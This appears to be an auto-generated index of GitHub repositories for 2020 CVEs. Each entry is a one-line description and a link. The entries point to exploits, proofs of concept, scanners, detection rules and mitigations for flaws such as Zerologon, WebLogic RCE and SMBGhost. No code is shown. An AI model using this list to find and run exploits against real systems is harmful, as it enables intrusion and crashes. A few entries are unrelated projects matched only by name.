**Online Bus Booking System 1.0,there is XSS through the name parameter in book_now.php** : [Ko-kn3t/CVE-2020-25272](https://api.github.com/repos/Ko-kn3t/CVE-2020-25272) create time: 2020-09-23T04:20:16Z

**CVE-2020-9992 - A design flaw in MobileDevice.framework/Xcode and iOS/iPadOS/tvOS Development Tools allows an attacker in the same network to gain remote code execution on a target device** : [c0ntextomy/c0ntextomy](https://api.github.com/repos/c0ntextomy/c0ntextomy) create time: 2020-09-16T23:35:22Z

**None** : [thomasfady/CVE-2020-25867](https://api.github.com/repos/thomasfady/CVE-2020-25867) create time: 2020-09-23T14:02:40Z

**CVE 2020-1472 Script de validación ** : [grupooruss/CVE-2020-1472](https://api.github.com/repos/grupooruss/CVE-2020-1472) create time: 2020-09-24T20:05:21Z

**None** : [defjamvan/cve20201472](https://api.github.com/repos/defjamvan/cve20201472) create time: 2020-09-25T01:33:25Z

**Patch and enforcement key assessment for CVE 2020-1472** : [technion/ZeroLogonAssess](https://api.github.com/repos/technion/ZeroLogonAssess) create time: 2020-09-25T03:06:50Z

**PoCs and technical analysis of three vulnerabilities found on Cisco AnyConnect for Windows: CVE-2020-3433, CVE-2020-3434 and CVE-2020-3435 ** : [goichot/CVE-2020-3433](https://api.github.com/repos/goichot/CVE-2020-3433) create time: 2020-09-25T20:53:48Z

**Online Bus Booking System 1.0, there is Authentication bypass on the Admin Login screen in admin.php via username or password SQL injection.** : [Ko-kn3t/CVE-2020-25273](https://api.github.com/repos/Ko-kn3t/CVE-2020-25273) create time: 2020-09-23T04:29:29Z

**None** : [striveben/CVE-2020-1472](https://api.github.com/repos/striveben/CVE-2020-1472) create time: 2020-09-26T08:31:47Z

**CVE-2020-11881: unauthenticated remote DoS for MikroTik SMB service.** : [botlabsDev/CVE-2020-11881](https://api.github.com/repos/botlabsDev/CVE-2020-11881) create time: 2020-06-17T12:15:56Z

**To crash Windows-10 easily** : [codewithpradhan/SMBGhost-CVE-2020-0796-](https://api.github.com/repos/codewithpradhan/SMBGhost-CVE-2020-0796-) create time: 2020-09-28T05:23:20Z

**None** : [Fa1c0n35/CVE-2020-1472-02-](https://api.github.com/repos/Fa1c0n35/CVE-2020-1472-02-) create time: 2020-09-28T06:53:41Z

**Snort rule for CVE 2020-1472 Detection** : [Sajuwithgithub/CVE2020-1472](https://api.github.com/repos/Sajuwithgithub/CVE2020-1472) create time: 2020-09-29T02:18:37Z

**This repository holds the advisory, exploits and vulnerable software of the CVE-2020-15492** : [patrickhener/CVE-2020-15492](https://api.github.com/repos/patrickhener/CVE-2020-15492) create time: 2020-09-24T08:36:40Z

**PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)** : [chipik/SAP_RECON](https://api.github.com/repos/chipik/SAP_RECON) create time: 2020-07-15T15:20:09Z

**None** : [Ken-Abruzzi/cve-2020-1472](https://api.github.com/repos/Ken-Abruzzi/cve-2020-1472) create time: 2020-09-30T07:45:50Z

**None** : [Ken-Abruzzi/CVE-2020-0674](https://api.github.com/repos/Ken-Abruzzi/CVE-2020-0674) create time: 2020-09-30T08:08:42Z

**Protect your domain controllers against Zerologon (CVE-2020-1472).** : [rhymeswithmogul/Set-ZerologonMitigation](https://api.github.com/repos/rhymeswithmogul/Set-ZerologonMitigation) create time: 2020-09-30T16:10:26Z

**A dll hijacking vulnerability in zoom meeting < 5.1.4. CVE-2020-9767** : [shubham0d/Zoom-dll-hijacking](https://api.github.com/repos/shubham0d/Zoom-dll-hijacking) create time: 2020-08-03T20:17:10Z

**Scanner for CVE-2020-0796 - SMBv3 RCE** : [ollypwn/SMBGhost](https://api.github.com/repos/ollypwn/SMBGhost) create time: 2020-03-11T15:21:27Z

**It is possible to enumerate valid usernames on the login page.** : [lukaszstu/SmartAsset-UE-CVE-2020-26526](https://api.github.com/repos/lukaszstu/SmartAsset-UE-CVE-2020-26526) create time: 2020-10-02T07:15:52Z

**Damstra Smart Asset 2020.7 has SQL injection via the API/api/Asset originator parameter.** : [lukaszstu/SmartAsset-SQLinj-CVE-2020-26525](https://api.github.com/repos/lukaszstu/SmartAsset-SQLinj-CVE-2020-26525) create time: 2020-10-02T07:12:18Z

**None** : [lukaszstu/SmartAsset-CORS-CVE-2020-26527](https://api.github.com/repos/lukaszstu/SmartAsset-CORS-CVE-2020-26527) create time: 2020-10-02T07:20:38Z

**This repository holds the advisory of the CVE-2020-14294** : [patrickhener/CVE-2020-14294](https://api.github.com/repos/patrickhener/CVE-2020-14294) create time: 2020-09-24T08:49:05Z

**This repository holds the advisory, exploits and vulnerable software of the CVE-2020-14293** : [patrickhener/CVE-2020-14293](https://api.github.com/repos/patrickhener/CVE-2020-14293) create time: 2020-09-24T09:17:38Z

**Zerologon AutoExploit Tool | CVE-2020-1472** : [Privia-Security/ADZero](https://api.github.com/repos/Privia-Security/ADZero) create time: 2020-09-29T20:43:06Z

**PoC exploits for CVE-2020-17382** : [uf0o/CVE-2020-17382](https://api.github.com/repos/uf0o/CVE-2020-17382) create time: 2020-09-17T18:26:32Z

**None** : [masoud-zivari/CVE-2020-14065](https://api.github.com/repos/masoud-zivari/CVE-2020-14065) create time: 2020-10-03T09:13:19Z

**None** : [masoud-zivari/CVE-2020-14066](https://api.github.com/repos/masoud-zivari/CVE-2020-14066) create time: 2020-10-03T09:17:35Z

**None** : [networksecure/CVE-2020-14066](https://api.github.com/repos/networksecure/CVE-2020-14066) create time: 2020-06-13T08:57:45Z

**None** : [masoud-zivari/CVE-2020-14064](https://api.github.com/repos/masoud-zivari/CVE-2020-14064) create time: 2020-10-03T09:30:34Z

**CVE-2020-11651&&CVE-2020-11652 EXP** : [heikanet/CVE-2020-11651-CVE-2020-11652-EXP](https://api.github.com/repos/heikanet/CVE-2020-11651-CVE-2020-11652-EXP) create time: 2020-05-07T09:17:39Z

**POC for checking multiple hosts for Zerologon vulnerability** : [WiIs0n/Zerologon_CVE-2020-1472](https://api.github.com/repos/WiIs0n/Zerologon_CVE-2020-1472) create time: 2020-09-29T18:45:44Z

**A proof of concept for CVE-2020-8958 written in Python.** : [qurbat/gpon](https://api.github.com/repos/qurbat/gpon) create time: 2020-07-15T08:10:01Z

**CVE-2020-26061 - ClickStudios Passwordstate Password Reset Portal** : [missing0x00/CVE-2020-26061](https://api.github.com/repos/missing0x00/CVE-2020-26061) create time: 2020-10-05T14:52:34Z

**Authenticated Stored XSS in LifeRay 7.2.0 GA1 via MyAccountPortlet executed by Search Results** : [3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934](https://api.github.com/repos/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934) create time: 2019-10-17T22:09:07Z

**CVE20206558** : [MIAIONE/CVE20206558](https://api.github.com/repos/MIAIONE/CVE20206558) create time: 2020-10-06T04:49:01Z

**Quick tool for checking CVE-2020-0688 on multiple hosts with a non-intrusive method.** : [onSec-fr/CVE-2020-0688-Scanner](https://api.github.com/repos/onSec-fr/CVE-2020-0688-Scanner) create time: 2020-02-28T16:04:30Z

**None** : [trump88/CVE-2020-24765](https://api.github.com/repos/trump88/CVE-2020-24765) create time: 2020-07-07T17:15:57Z

**None** : [glasses618/CVE-2020-15169](https://api.github.com/repos/glasses618/CVE-2020-15169) create time: 2020-10-08T15:42:37Z

**Jiangmin** : [intrigus-lgtm/CVE-2020-14955](https://api.github.com/repos/intrigus-lgtm/CVE-2020-14955) create time: 2020-10-08T14:41:23Z

**Typesetter CMS文件上传漏洞环境** : [7Mitu/CVE-2020-25790](https://api.github.com/repos/7Mitu/CVE-2020-25790) create time: 2020-10-09T06:50:02Z

**CVE-2020-15227 exploit** : [hu4wufu/CVE-2020-15227](https://api.github.com/repos/hu4wufu/CVE-2020-15227) create time: 2020-10-10T02:38:15Z

**None** : [shanfenglan/cve-2020-1472](https://api.github.com/repos/shanfenglan/cve-2020-1472) create time: 2020-10-10T09:00:41Z

**None** : [Ken-Abruzzi/cve_2020_0796](https://api.github.com/repos/Ken-Abruzzi/cve_2020_0796) create time: 2020-10-10T09:20:40Z

**None** : [Ken-Abruzzi/cve_2020_0688](https://api.github.com/repos/Ken-Abruzzi/cve_2020_0688) create time: 2020-10-10T09:46:24Z

**Just basic scanner abusing CVE-2020-3452 to enumerate the standard files accessible in the Web Directory of the CISCO ASA applicances.** : [3ndG4me/CVE-2020-3452-Exploit](https://api.github.com/repos/3ndG4me/CVE-2020-3452-Exploit) create time: 2020-09-28T05:00:37Z

**None** : [dima5455/CVE2020](https://api.github.com/repos/dima5455/CVE2020) create time: 2020-09-20T10:36:19Z

**https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8** : [mansoorr123/wp-file-manager-CVE-2020-25213](https://api.github.com/repos/mansoorr123/wp-file-manager-CVE-2020-25213) create time: 2020-10-10T17:50:01Z

**CVE-2020-2021** : [mr-r3b00t/CVE-2020-2021](https://api.github.com/repos/mr-r3b00t/CVE-2020-2021) create time: 2020-06-29T16:56:10Z

**CVE-2020-11113:Jackson-databind RCE** : [Al1ex/CVE-2020-11113](https://api.github.com/repos/Al1ex/CVE-2020-11113) create time: 2020-05-21T14:00:33Z

**None** : [toy0756428/CVE_2020_3452_Detect](https://api.github.com/repos/toy0756428/CVE_2020_3452_Detect) create time: 2020-10-14T07:52:00Z

**HoneyPoC 2.0: Proof-of-Concept (PoC) script to exploit IPv6 (CVE-2020-16898).** : [ZephrFish/CVE-2020-16898](https://api.github.com/repos/ZephrFish/CVE-2020-16898) create time: 2020-10-14T14:42:52Z

**None** : [FancyDoesSecurity/CVE-2020-2883](https://api.github.com/repos/FancyDoesSecurity/CVE-2020-2883) create time: 2020-10-14T23:12:39Z

**None** : [Security-AVS/CVE-2020-16270](https://api.github.com/repos/Security-AVS/CVE-2020-16270) create time: 2020-10-15T14:06:28Z

**Detects CVE-2020-16898: "Bad Neighbor"** : [esnet-security/cve-2020-16898](https://api.github.com/repos/esnet-security/cve-2020-16898) create time: 2020-10-14T16:38:06Z

**Exploit for zerologon cve-2020-1472** : [risksense/zerologon](https://api.github.com/repos/risksense/zerologon) create time: 2020-09-14T19:19:07Z

**A local privilege escalation chain from user to kernel for MacOS < 10.15.5. CVE-2020–9854** : [A2nkF/unauthd](https://api.github.com/repos/A2nkF/unauthd) create time: 2020-07-31T20:24:22Z

**Windows RDNSS RCE** : [bkerler/CVE-2020-16899](https://api.github.com/repos/bkerler/CVE-2020-16899) create time: 2020-10-16T10:44:22Z

**Minor powershell script that checks for vulnerable interfaces.** : [Maliek/CVE-2020-16898_Check](https://api.github.com/repos/Maliek/CVE-2020-16898_Check) create time: 2020-10-14T13:30:38Z

**PoC Bad Neighbor BSOD exploit** : [Q1984/CVE-2020-16898](https://api.github.com/repos/Q1984/CVE-2020-16898) create time: 2020-10-16T06:27:24Z

**PoC BSOD for CVE-2020-16898 (badneighbor)** : [0xeb-bp/cve-2020-16898](https://api.github.com/repos/0xeb-bp/cve-2020-16898) create time: 2020-10-16T23:03:15Z

**PoC BSOD for CVE-2020-16898** : [jiansiting/cve-2020-16898](https://api.github.com/repos/jiansiting/cve-2020-16898) create time: 2020-10-17T04:32:11Z

**None** : [Ken-Abruzzi/cve_2020_16947](https://api.github.com/repos/Ken-Abruzzi/cve_2020_16947) create time: 2020-10-17T08:05:45Z

**Detect vulns liferay CVE-2020-7961 by Nattroc (EOG Team)** : [shacojx/GLiferay-CVE-2020-7961-golang](https://api.github.com/repos/shacojx/GLiferay-CVE-2020-7961-golang) create time: 2020-10-17T08:32:51Z

**C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon** : [CPO-EH/CVE-2020-1472_ZeroLogonChecker](https://api.github.com/repos/CPO-EH/CVE-2020-1472_ZeroLogonChecker) create time: 2020-10-17T00:14:08Z

**None** : [momika233/CVE-2020-16898-exp](https://api.github.com/repos/momika233/CVE-2020-16898-exp) create time: 2020-10-17T13:52:08Z

**None** : [SplendidSky/CVE-2020-8835](https://api.github.com/repos/SplendidSky/CVE-2020-8835) create time: 2020-10-18T03:17:58Z

**None** : [johnpathe/zerologon-cve-2020-1472-notes](https://api.github.com/repos/johnpathe/zerologon-cve-2020-1472-notes) create time: 2020-09-20T13:44:16Z

**None** : [HYWZ36/HYWZ36-CVE-2020-11989-code](https://api.github.com/repos/HYWZ36/HYWZ36-CVE-2020-11989-code) create time: 2020-10-18T08:34:47Z

**ThinkAdmin CVE-2020-25540 poc** : [Schira4396/CVE-2020-25540](https://api.github.com/repos/Schira4396/CVE-2020-25540) create time: 2020-10-19T09:56:20Z

**CVE-2020-16899 - Microsoft Windows TCP/IP Vulnerability Detection Logic and Rule** : [advanced-threat-research/CVE-2020-16899](https://api.github.com/repos/advanced-threat-research/CVE-2020-16899) create time: 2020-10-12T20:59:03Z

**cve-2020-14644 漏洞环境** : [0xkami/cve-2020-14644](https://api.github.com/repos/0xkami/cve-2020-14644) create time: 2020-10-20T08:25:40Z

**PoC of CVE-2020-16947 (Microsoft Outlook RCE vulnerablility)** : [0neb1n/CVE-2020-16947](https://api.github.com/repos/0neb1n/CVE-2020-16947) create time: 2020-10-15T14:32:25Z

**None** : [ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure](https://api.github.com/repos/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure) create time: 2020-03-26T23:14:55Z

**None** : [puckiestyle/CVE-2020-1472](https://api.github.com/repos/puckiestyle/CVE-2020-1472) create time: 2020-10-21T09:42:34Z

**Test tool for CVE-2020-1472** : [SecuraBV/CVE-2020-1472](https://api.github.com/repos/SecuraBV/CVE-2020-1472) create time: 2020-09-08T08:58:37Z

**Bypassing NTFS permissions to read any files as unprivileged user.** : [ioncodes/CVE-2020-16938](https://api.github.com/repos/ioncodes/CVE-2020-16938) create time: 2020-10-21T15:38:22Z

**PowerShell Script Workaround for VCE-220-16898 Vulnerability** : [CPO-EH/CVE-2020-16898_Workaround](https://api.github.com/repos/CPO-EH/CVE-2020-16898_Workaround) create time: 2020-10-17T07:09:58Z

**Check all Network Interfaces for CVE-2020-16898 Vulnerability** : [CPO-EH/CVE-2020-16898_Checker](https://api.github.com/repos/CPO-EH/CVE-2020-16898_Checker) create time: 2020-10-17T10:23:56Z

**CVE-2020-10238: Incorrect Access Control in com_templates PoC** : [HoangKien1020/CVE-2020-10238](https://api.github.com/repos/HoangKien1020/CVE-2020-10238) create time: 2020-03-05T04:23:12Z

**A network detection package for CVE-2020-16898 (Windows TCP/IP Remote Code Execution Vulnerability)** : [corelight/CVE-2020-16898](https://api.github.com/repos/corelight/CVE-2020-16898) create time: 2020-10-14T03:25:00Z

**Zeek detection for CVE-2020-16898-"Bad Neighbor"** : [initconf/CVE-2020-16898-Bad-Neighbor](https://api.github.com/repos/initconf/CVE-2020-16898-Bad-Neighbor) create time: 2020-10-14T21:25:09Z

**2020l4web-typography-css-library-DanCvejn created by GitHub Classroom** : [pslib-cz/2020l4web-typography-css-library-DanCvejn](https://api.github.com/repos/pslib-cz/2020l4web-typography-css-library-DanCvejn) create time: 2020-09-18T08:04:11Z

**None** : [kursataker/cve303_fall_2020](https://api.github.com/repos/kursataker/cve303_fall_2020) create time: 2020-10-23T16:01:43Z

**CVE-2020-0688 PoC** : [zyn3rgy/ecp_slap](https://api.github.com/repos/zyn3rgy/ecp_slap) create time: 2020-10-23T01:18:13Z

**CVE-2020-16898 (Bad Neighbor) Microsoft Windows TCP/IP Vulnerability Detection Logic and Rule** : [advanced-threat-research/CVE-2020-16898](https://api.github.com/repos/advanced-threat-research/CVE-2020-16898) create time: 2020-10-07T19:56:09Z

**Writeup of CVE-2020-15906** : [S1lkys/CVE-2020-15906](https://api.github.com/repos/S1lkys/CVE-2020-15906) create time: 2020-07-23T09:20:53Z

**cve-2020-15148** : [0xkami/cve-2020-15148](https://api.github.com/repos/0xkami/cve-2020-15148) create time: 2020-10-27T07:33:47Z

**PoC code for CVE-2020-16939 Windows Group Policy DACL Overwrite Privilege Escalation** : [rogue-kdc/CVE-2020-16939](https://api.github.com/repos/rogue-kdc/CVE-2020-16939) create time: 2020-10-14T00:03:49Z

**Windows 7 LPE** : [Graham382/CVE-2020-1054](https://api.github.com/repos/Graham382/CVE-2020-1054) create time: 2020-10-28T00:48:43Z

**CVE-2020-16898 Windows TCP/IP远程代码执行漏洞 EXP&POC** : [komomon/CVE-2020-16898-EXP-POC](https://api.github.com/repos/komomon/CVE-2020-16898-EXP-POC) create time: 2020-10-20T05:24:47Z

**CVE-2020-16898 Windows TCP/IP远程代码执行漏洞 EXP&POC** : [komomon/CVE-2020-16898--EXP-POC](https://api.github.com/repos/komomon/CVE-2020-16898--EXP-POC) create time: 2020-10-28T11:25:58Z

**All five experiments of computer vision courses opened at Xidian University. CV XDU** : [Jiehuishun/CVExp-XDU-2020-CS5201](https://api.github.com/repos/Jiehuishun/CVExp-XDU-2020-CS5201) create time: 2020-09-22T08:54:12Z

**CVE-2020–14882 by Jang** : [s1kr10s/CVE-2020-14882](https://api.github.com/repos/s1kr10s/CVE-2020-14882) create time: 2020-10-28T21:28:12Z

**CVE-2020-14882 Weblogic-Exp** : [RedTeamWing/CVE-2020-14882](https://api.github.com/repos/RedTeamWing/CVE-2020-14882) create time: 2020-10-29T06:30:30Z

**EasyAntiCheat minifilter, thread and image callback bypass** : [dec-h4xu3lyn/CVEAC-2020-0002](https://api.github.com/repos/dec-h4xu3lyn/CVEAC-2020-0002) create time: 2020-10-28T19:19:08Z

**Possible Account Takeover | Brute Force Ability** : [jet-pentest/CVE-2020-27747](https://api.github.com/repos/jet-pentest/CVE-2020-27747) create time: 2020-10-29T09:06:24Z

**Scans for Microsoft Exchange Versions with masscan** : [SLSteff/CVE-2020-0688-Scanner](https://api.github.com/repos/SLSteff/CVE-2020-0688-Scanner) create time: 2020-10-29T15:16:24Z

**POC For CVE-2020-1481 - Jira Username Enumerator/Validator** : [Rival420/CVE-2020-14181](https://api.github.com/repos/Rival420/CVE-2020-14181) create time: 2020-10-26T17:07:28Z

**osCommerce Phoenix CE <=1.0.5.4 Authenticated RCE** : [k0rnh0li0/CVE-2020-27976](https://api.github.com/repos/k0rnh0li0/CVE-2020-27976) create time: 2020-10-30T13:59:23Z

**PoC for CVE-2020-14882** : [sickwell/CVE-2020-14882](https://api.github.com/repos/sickwell/CVE-2020-14882) create time: 2020-10-30T18:46:34Z

**Bash script to exploit the Oracle's Weblogic Unauthenticated Remote Command Execution - CVE-2020-14882** : [0thm4n3/cve-2020-14882](https://api.github.com/repos/0thm4n3/cve-2020-14882) create time: 2020-10-29T13:53:31Z

**None** : [alexfrancow/CVE-2020-14882](https://api.github.com/repos/alexfrancow/CVE-2020-14882) create time: 2020-10-30T11:07:11Z

**Pulse Secure VPN mitm Research - CVE-2020-8241, CVE-2020-8239** : [withdk/pulse-secure-vpn-mitm-research](https://api.github.com/repos/withdk/pulse-secure-vpn-mitm-research) create time: 2020-10-25T15:58:02Z

**(CVE-2020-14882) Oracle Weblogic Unauthorized bypass RCE test script** : [ludy-dev/Weblogic_Unauthorized-bypass-RCE](https://api.github.com/repos/ludy-dev/Weblogic_Unauthorized-bypass-RCE) create time: 2020-11-01T13:12:27Z

**None** : [masahiro331/CVE-2020-8165](https://api.github.com/repos/masahiro331/CVE-2020-8165) create time: 2020-05-20T04:27:52Z

**CVE-2020-27358 and CVE-2020-27359** : [seb1055/cve-2020-27358-27359](https://api.github.com/repos/seb1055/cve-2020-27358-27359) create time: 2020-11-02T04:54:52Z

**Exploit for WebSocket Vulnerability in Apache Tomcat** : [RedTeamPentesting/CVE-2020-13935](https://api.github.com/repos/RedTeamPentesting/CVE-2020-13935) create time: 2020-11-02T14:48:55Z

**PoC for Zerologon - all research credits go to Tom Tervoort of Secura** : [dirkjanm/CVE-2020-1472](https://api.github.com/repos/dirkjanm/CVE-2020-1472) create time: 2020-09-14T16:56:51Z

**CVE-2020-14882 detection script** : [ovProphet/CVE-2020-14882-checker](https://api.github.com/repos/ovProphet/CVE-2020-14882-checker) create time: 2020-11-03T11:34:38Z

**Elevation Of Privileges Proof of Concept for Windows (win7-win10)** : [TinToSer/CVE2020-17087](https://api.github.com/repos/TinToSer/CVE2020-17087) create time: 2020-11-03T22:08:34Z

**CVE-2020-14882/14883/14750** : [NS-Sp4ce/CVE-2020-14882](https://api.github.com/repos/NS-Sp4ce/CVE-2020-14882) create time: 2020-11-04T03:09:13Z

**rConfig 3.9 EDB-ID: 48208 CVE: 2020-10220 WEBAPPS** : [arvind2022/isac_rconfig3.9](https://api.github.com/repos/arvind2022/isac_rconfig3.9) create time: 2020-11-04T04:22:40Z

**None** : [willinin/CVE-2020-27194-exp](https://api.github.com/repos/willinin/CVE-2020-27194-exp) create time: 2020-11-04T12:02:34Z

**None** : [ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go](https://api.github.com/repos/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go) create time: 2020-11-04T16:43:04Z

**CSV Injection exists in InterMind iMind Server through 3.13.65 via the csv export functionality.** : [h3llraiser/CVE-2020-25398](https://api.github.com/repos/h3llraiser/CVE-2020-25398) create time: 2020-07-13T09:37:11Z

**Stored XSS in InterMind iMind Server through 3.13.65 allows any user to hijack another user's session by sending a malicious file in the chat.** : [h3llraiser/CVE-2020-25399](https://api.github.com/repos/h3llraiser/CVE-2020-25399) create time: 2020-07-13T09:37:38Z

**None** : [mmioimm/cve-2020-14882](https://api.github.com/repos/mmioimm/cve-2020-14882) create time: 2020-11-05T13:12:28Z

**CVE-2020-27688** : [matthiasmaes/CVE-2020-27688](https://api.github.com/repos/matthiasmaes/CVE-2020-27688) create time: 2020-10-23T06:02:28Z

**None** : [mingchen-script/CVE-2020-1472-visualizer](https://api.github.com/repos/mingchen-script/CVE-2020-1472-visualizer) create time: 2020-11-05T15:17:14Z

**Exploit Code for CVE-2020-1472 aka Zerologon** : [VoidSec/CVE-2020-1472](https://api.github.com/repos/VoidSec/CVE-2020-1472) create time: 2020-09-14T16:57:49Z

**CVE-2020-15227 exploit** : [Langriklol/CVE-2020-15227](https://api.github.com/repos/Langriklol/CVE-2020-15227) create time: 2020-10-09T13:13:14Z

**CVE-2020-0796-POC** : [AaronWilsonGrylls/CVE-2020-0796-POC](https://api.github.com/repos/AaronWilsonGrylls/CVE-2020-0796-POC) create time: 2020-11-06T03:56:52Z

**tomcat-embed-core-9.0.31 CVE-2020-11996 Test PoC** : [rusakovichma/tomcat-embed-core-9.0.31-CVE-2020-11996](https://api.github.com/repos/rusakovichma/tomcat-embed-core-9.0.31-CVE-2020-11996) create time: 2020-07-27T13:22:21Z

**Exchange Scanner CVE-2020-0688** : [righter83/CVE-2020-0688](https://api.github.com/repos/righter83/CVE-2020-0688) create time: 2020-02-27T23:55:04Z

**(CVE-2020-3452) Cisco Adaptive Security Appliance Software - Local File Inclusion Vuln Test sciript** : [ludy-dev/Cisco-ASA-LFI](https://api.github.com/repos/ludy-dev/Cisco-ASA-LFI) create time: 2020-08-31T14:11:19Z

**(CVE-2020-5902) BIG IP F5 TMUI RCE Vulnerability RCE PoC/ Test Script ** : [ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability](https://api.github.com/repos/ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability) create time: 2020-09-09T20:15:03Z

**(CVE-2020-17496) vBulletin 5.x Widget_tabbedcontainer_tab_panel RCE Vuln Test script** : [ludy-dev/vBulletin_5.x-tab_panel-RCE](https://api.github.com/repos/ludy-dev/vBulletin_5.x-tab_panel-RCE) create time: 2020-09-03T14:41:29Z

**None** : [mooneee/cve-2020-7897](https://api.github.com/repos/mooneee/cve-2020-7897) create time: 2020-11-07T16:20:45Z

**CVE-2020-14882 EXP 回显** : [wsfengfan/cve-2020-14882](https://api.github.com/repos/wsfengfan/cve-2020-14882) create time: 2020-10-29T15:44:23Z

**CVE-2020-28351 - Reflected Cross-Site Scripting attack in ShoreTel version 19.46.1802.0.** : [dievus/CVE-2020-28351](https://api.github.com/repos/dievus/CVE-2020-28351) create time: 2020-11-06T18:49:47Z

**[CVE-2020-14882] Oracle WebLogic Server Authentication Bypass** : [murataydemir/CVE-2020-14882](https://api.github.com/repos/murataydemir/CVE-2020-14882) create time: 2020-11-09T13:02:43Z

**[CVE-2020-14882] Oracle WebLogic Server Authenticated Remote Code Execution (RCE)** : [murataydemir/CVE-2020-14883](https://api.github.com/repos/murataydemir/CVE-2020-14883) create time: 2020-11-09T15:26:28Z

**None** : [kkhacklabs/CVE-2020-14750](https://api.github.com/repos/kkhacklabs/CVE-2020-14750) create time: 2020-11-09T17:58:11Z

**CVE-2020-13277 靶场: Gitlab 逻辑漏洞 - 任意用户越权访问私有仓库** : [lyy289065406/CVE-2020-13277](https://api.github.com/repos/lyy289065406/CVE-2020-13277) create time: 2020-10-31T11:01:26Z

**PoC para las vulnerabilidades CVE-2020-14750 y cve-2020-14882** : [pprietosanchez/CVE-2020-14750](https://api.github.com/repos/pprietosanchez/CVE-2020-14750) create time: 2020-11-06T12:46:03Z

**Proof of Concept of Libreoffice file exfiltration vulnerability in Big Blue Button** : [hannob/CVE-2020-27603-bbb-libreoffice-poc](https://api.github.com/repos/hannob/CVE-2020-27603-bbb-libreoffice-poc) create time: 2020-11-10T20:26:44Z

**CVE-2020-23968** : [ricardojba/CVE-2020-23968-ILEX-SignGo-EoP](https://api.github.com/repos/ricardojba/CVE-2020-23968-ILEX-SignGo-EoP) create time: 2020-11-10T14:39:20Z

**CVE-2020-0796-exp** : [ysyyrps123/CVE-2020-0796-exp](https://api.github.com/repos/ysyyrps123/CVE-2020-0796-exp) create time: 2020-06-02T12:04:53Z

**None** : [billHuangPY/CVE-2020](https://api.github.com/repos/billHuangPY/CVE-2020) create time: 2020-11-11T03:38:00Z

**基于qt的图形化CVE-2020-14882漏洞回显测试工具.** : [AirEvan/CVE-2020-14882-GUI-Test](https://api.github.com/repos/AirEvan/CVE-2020-14882-GUI-Test) create time: 2020-11-11T06:52:32Z

**Weblogic 身份认证绕过漏洞批量检测脚本** : [B1anda0/CVE-2020-14883](https://api.github.com/repos/B1anda0/CVE-2020-14883) create time: 2020-11-11T08:52:28Z

**Check for events that indicate non compatible devices -> CVE-2020-1472** : [maikelnight/zerologon](https://api.github.com/repos/maikelnight/zerologon) create time: 2020-10-15T15:02:53Z

**Static standalone binaries for Windows and Linux (both x64) of dirkjanm's CVE-2020-1472 POC Python scripts** : [Qazeer/dirkjanm_CVE-2020-1472_static_binaries](https://api.github.com/repos/Qazeer/dirkjanm_CVE-2020-1472_static_binaries) create time: 2020-11-10T21:35:15Z

**Netwrix Account Lockout Examiner 4.1 Domain Admin Account Credential Disclosure Vulnerability** : [optiv/CVE-2020-15931](https://api.github.com/repos/optiv/CVE-2020-15931) create time: 2020-07-29T19:02:29Z

**some files created during analysis of ProFTPd vulnerability - no exploit created yet** : [ptef/CVE-2020-9273](https://api.github.com/repos/ptef/CVE-2020-9273) create time: 2020-11-05T20:22:40Z

**None** : [zavke/CVE-2020-10189-ManageEngine](https://api.github.com/repos/zavke/CVE-2020-10189-ManageEngine) create time: 2020-11-12T02:36:09Z

**A network detection package for CVE-2020-5902, a CVE10.0 vulnerability affecting F5 Networks, Inc BIG-IP devices.** : [corelight/CVE-2020-5902-F5BigIP](https://api.github.com/repos/corelight/CVE-2020-5902-F5BigIP) create time: 2020-07-28T00:43:14Z

**None** : [QmF0c3UK/CVE-2020-14882](https://api.github.com/repos/QmF0c3UK/CVE-2020-14882) create time: 2020-11-09T08:03:44Z

**A bash script exploit of [CVE-2020-16126/CVE-2020-16127] to achieve privilege escalation.Ubuntu 16.04-20.04 LTS本地提权漏洞利用脚本。要求拥有Gnome图形化环境。** : [zev3n/Ubuntu-Gnome-privilege-escalation](https://api.github.com/repos/zev3n/Ubuntu-Gnome-privilege-escalation) create time: 2020-11-12T09:58:42Z

**None** : [jet-pentest/CVE-2020-28414](https://api.github.com/repos/jet-pentest/CVE-2020-28414) create time: 2020-11-12T13:31:50Z

**None** : [jet-pentest/CVE-2020-28415](https://api.github.com/repos/jet-pentest/CVE-2020-28415) create time: 2020-11-12T13:32:23Z

**Exploit CVE-2020-13886 - LFI Intelbras TIP 200 / 200 LITE / ** : [lucxssouza/CVE-2020-13886](https://api.github.com/repos/lucxssouza/CVE-2020-13886) create time: 2020-06-08T20:52:04Z

**None** : [x51/CVE-2020-14882](https://api.github.com/repos/x51/CVE-2020-14882) create time: 2020-11-12T11:27:39Z

**None** : [umiterkol/CVE-2020-8165--Auto-Shell](https://api.github.com/repos/umiterkol/CVE-2020-8165--Auto-Shell) create time: 2020-11-13T09:01:12Z

**Vulnerability Description of CVE-2020-15349** : [Traxes/Forklift_LPE](https://api.github.com/repos/Traxes/Forklift_LPE) create time: 2020-11-13T12:20:07Z

**CVE-2020-25213 Wordpress File Manager 6.7 Plugin 0day exploit** : [kakamband/WPKiller](https://api.github.com/repos/kakamband/WPKiller) create time: 2020-11-13T14:47:27Z

**GOG Galaxy Local Privilege Escalation** : [lagartojuancho/CVE-2020-25769](https://api.github.com/repos/lagartojuancho/CVE-2020-25769) create time: 2020-11-13T17:42:40Z

**PoC for CVE-2020-25705 POC-2020-25705** : [tdwyer/CVE-2020-25705](https://api.github.com/repos/tdwyer/CVE-2020-25705) create time: 2020-11-14T08:53:13Z

**None** : [kukudechen-chen/cve-2020-1938](https://api.github.com/repos/kukudechen-chen/cve-2020-1938) create time: 2020-11-14T13:55:58Z

**None** : [jpvispo/RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041](https://api.github.com/repos/jpvispo/RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041) create time: 2020-11-15T01:23:12Z

